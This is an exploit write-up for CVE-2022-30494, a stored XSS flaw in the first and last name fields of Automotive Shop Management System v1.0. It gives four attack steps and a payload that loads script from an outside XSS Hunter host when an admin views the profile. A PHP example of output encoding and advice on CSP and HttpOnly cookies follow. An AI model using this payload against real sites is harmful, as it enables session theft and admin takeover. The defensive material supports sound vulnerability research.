CVE-2022-30494: OpenSource/exploit_xss_asms.md at main · nsparker1337/OpenSource

In oretnom23 Automotive Shop Management System v1.0, the first and last name user fields suffer from a stored XSS Injection Vulnerability allowing remote attackers to gain admin access and view internal IPs.

nsparker1337 Add files via upload

Latest commit 220bbb8 May 6, 2022


Exploit Title: Automotive Shop Management System v1.0 - Stored Cross Site Scripting (XSS)
Exploit Author: NS Kumar (n1_x)
Date: May 6, 2022
Vendor Homepage: https://www.sourcecodester.com/php/15312/automotive-shop-management-system-phpoop-free-source-code.html
Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/asms_0.zip
Tested on: Parrot Linux, Apache, MySQL
Vendor: oretnom23
Version: v1.0

Exploit Description: Automotive Shop Management System v1.0 suffers from a stored XSS injection vulnerability allowing remote attackers to gain admin access and view internal IPs.


To Exploit

Step 1: Go to the Profile page

Step 2: Put the XSS Hunter payload in either the First Name or Last Name field

Step 3: Wait for the admin to view your details

Step 4: The XSS then fires and an alert appears on the XSS Hunter page

Payload Used for this Exploit: "><script src=https://d4.xss.ht></script>
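The payload starts with `">`, which only has an effect when the stored name is written into a quoted HTML attribute without encoding. As an added example (not code from the ASMS project or from this write-up; the function names and the input-field markup are assumptions), here is that output pattern next to its output-encoded form in PHP, run from the command line:

```php
<?php
// Added example: hypothetical rendering helpers, not the application's own code.

// Constructed input: the stored first-name value, taken from the payload line above.
$firstname = '"><script src=https://d4.xss.ht></script>';

// Vulnerable pattern: the stored value is concatenated into the attribute as-is.
// The leading "> closes the attribute and the tag, so the <script> element
// becomes live markup when an admin opens the user's details.
function render_unsafe(string $value): string
{
    return '<input type="text" name="firstname" value="' . $value . '">';
}

// Hardened pattern: encode for the HTML context at output time.
// ENT_QUOTES encodes both " and '; ENT_SUBSTITUTE replaces invalid UTF-8
// sequences instead of returning an empty string.
function e(string $value): string
{
    return htmlspecialchars($value, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
}

function render_safe(string $value): string
{
    return '<input type="text" name="firstname" value="' . e($value) . '">';
}

$unsafe = render_unsafe($firstname);
$safe   = render_safe($firstname);

// Check: the unsafe output carries a script tag, the encoded output does not.
if (strpos($unsafe, '<script') === false) {
    throw new RuntimeException('expected the unsafe output to contain <script');
}
if (strpos($safe, '<script') !== false || strpos($safe, '&quot;&gt;&lt;script') === false) {
    throw new RuntimeException('expected the safe output to be entity-encoded');
}

echo "unsafe: $unsafe\n";
echo "safe:   $safe\n";
```

Encoding belongs at every place the first and last name are printed, not only on the profile form. A `Content-Security-Policy` with `script-src 'self'` on the admin pages and the `HttpOnly` flag on the session cookie further limit what an injected script can load or read.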
